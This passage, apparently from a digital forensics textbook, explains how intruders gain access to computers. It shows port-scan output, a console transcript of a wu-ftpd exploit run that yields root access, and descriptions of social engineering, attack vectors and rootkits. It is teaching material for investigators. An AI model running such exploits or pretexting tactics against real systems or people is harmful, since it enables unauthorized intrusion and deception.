The most straightforward way to break into a computer is to steal or guess a password. However, if this is not a viable option, an intruder can usually gather enough information about a system to gain access to it. The most basic way to gather information about a system is to use a port scanner as shown here:
% probe_tcp_ports 192.168.52.2 Host 192.168.52.2, Port 7 ("echo" service) connection ... open. Host 192.168.52.2, Port 9 ("discard" service) connection ... open. Host 192.168.52.2, Port 13 ("daytime" service) connection ... open. Host 192.168.52.2, Port 19 ("chargen" service) connection ... open. Host 192.168.52.2, Port 21 ("ftp" service) connection ... open. Host 192.168.52.2, Port 23 ("telnet" service) connection ... open. Host 192.168.52.2, Port 25 ("smtp" service) connection ... open. Host 192.168.52.2, Port 53 ("domain" service) connection ... open. Host 192.168.52.2, Port 69 connection ... open. Host 192.168.52.2, Port 79 ("finger" service) connection ... open. Host 199.168.52.2, Port 110 ("pop" service) connection ... open.
This basic TCP port scanner shows that, in addition to running an e-mail server on port 25, this computer has a number of other servers, including an FTP server on port 21 for people to transfer files to and from the computer, a finger server on port 79 that can give out information about individuals with accounts on the machine, and a POP server for users to check their e-mail remotely. The operating system and server version can often be inferred from this type of port scan, or using a more advanced port scanner like nmap. Knowing the operating system and services that are running on a computer is often all that is required - because certain services on certain operating systems are known to be vulnerable. For instance, the following shows an exploit that is freely available on the Internet being used to gain unauthorized access to an FTP server:
% wuftpd-exploit -t 192.168.7.25 -s 0 Target: 192.168.7.25 (ftp/<shellcode>):RedHat 6.2 with wuftpd 2.6.0(1) Return Address: 0x08075844, AddrRetAddr. 0xbfffb028, Shellcode: 152 loggin into system.. USER ftp 331 Guest login ok, send your complete e-mail address as password. PASS <shellcode> 230-Next time please use your e-mail address as your password 230 Guest login ok, access restrictions apply. STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] STEP 3 : Checking if we can reach our return address by format string STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now) STEP 5 : Sending code.. this will take about 10 seconds. Press ^\ to leave shell Linux ftp-server.corpX.com 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 200 0 i586 unknown uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) w 8:54am up 3 days, 12:21, 0 users, load average: 0.12, 0.09, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT last ftp ftpd7718 intruder.isp.com Wed Sep 20 08:52 still logged in ftp ftpd7291 helpsrv.smut.com Tue Sep 19 15:13 still logged in reboot system boot 2.2.14-5.0 Sat Sep 16 20:33 (3 + 12:21) ftp ftpd1120 203.235.121.105 Sun Sep 10 04:08 - down (1+21:32) ftp ftpd833 mail2.txinc.com Sat Sep 9 21:39 - down (2+04:02) reboot system boot 2.2.14-5.0 Sat Sep 9 12:21 (2+13:20) wtmp begins Thu Sep 7 17:59:03 2000
When intruders cannot access a system through known security holes, they use less technical methods to gain access. Intruders sometimes even dig through garbage for useful information. Intruders also try to get information using social engineering and reverse social engineering. Social engineering refers to any attempt to contact legitimate users of the target system and trick them into giving out information that can be used by the intruder to break into the system. For example, calling someone and pretending to be a new employee who is having trouble getting started can result in useful information like computer names, operating systems, and even some information about employee accounts. Alternatively, pretending to be a computer technician who is trying to fix a problem can also lead to useful information. There are many different ways to do this, including calling people claiming to be looking into a problem or going into the organization to look around. Some people will even make the mistake of giving out their passwords.
Reverse social engineering is any attempt to have someone in the target organization contact you for assistance. Instead of contacting them, they contact you. For example, sending a memo with a "new" technical support e-mail can result in a flood of information. The advantage of reverse social engineering is that the user is less likely to be suspicious and report the incident. When people seek help from an intruder who resolves their problems, they are less likely to be suspicious and are unlikely to have any reason to report the incident to anyone.
Table 19.1 summarizes the various methods of approach/attack. The categories are not mutually exclusive - intruders may employ several of these attack vectors to achieve their goals.
ATTACK VECTOR NAME | DESCRIPTION |
---|---|
Authentication bypass | Gaining access while avoiding standard authentication |
Authentication failure | Taking advantage of authentication systems which "fail open" |
Buffer overflows | Exploiting stack memory overwriting in networked server programs |
Password cracking | Brute-force, reverse-engineering, and "dictionary" based methods used to discover account passwords |
Password sniffing | Capturing account passwords via a network "tap" |
Session hijacking | Piggybacking on authorized user connections from the Internet into internal hosts and networks |
Social engineering | Impersonation of authorized personnel to gain access or network passwords |
Spoofing | Having a computer masquerade as a different "trusted" computer to gain access |
Trojan horses | Malicious programs such as BackOrifice can provide "back doors" (unauthorized avenues for access) into hosts from the Internet |
Many of the attack methods in Table 19.1 were discussed in earlier chapters such as buffer overflows in Chapter 15, session hijacking in Chapter 16, and IP spoofing in Chapter 17.
After intruders gain access to a computer, they may be able to compromise the administrator account (known as "root" on UNIX systems) thus getting unrestricted access to the entire system. In fact, certain security holes allow computer intruders to break into a computer and get root access in one step. With unlimited access to the system, it is possible for an offender to modify any information on the computer, thus removing traces of an intrusion. Intruders may change the system clock, delete log files, and replace system components. There are specific computer programs, called rootkits, which automate the process of hiding a break-in enabling a low skilled offender to exhibit higher skilled behavior. For example, the Rootkit[2] project is developing such a program for Windows machines. More sophisticated rootkits such as Knark, Sebek, and Suckit on Linux are emerging, making intrusion investigations even more challenging. Increasingly, criminals are using strong encryption on UNIX systems such as encrypted RAM disks, Blowfish encryption in IRC eggdrop bots, encrypted executables using Teso Burneye (Phrack 58, 2001), and using other "anti-forensic" tools to make digital evidence examinations more difficult (Phrack 59, 2002).
Once an intruder has gained access to one computer on a network, it may be possible to gather additional information about a network and obtain passwords to other systems using a sniffer.
[2]http://www.rootkit.com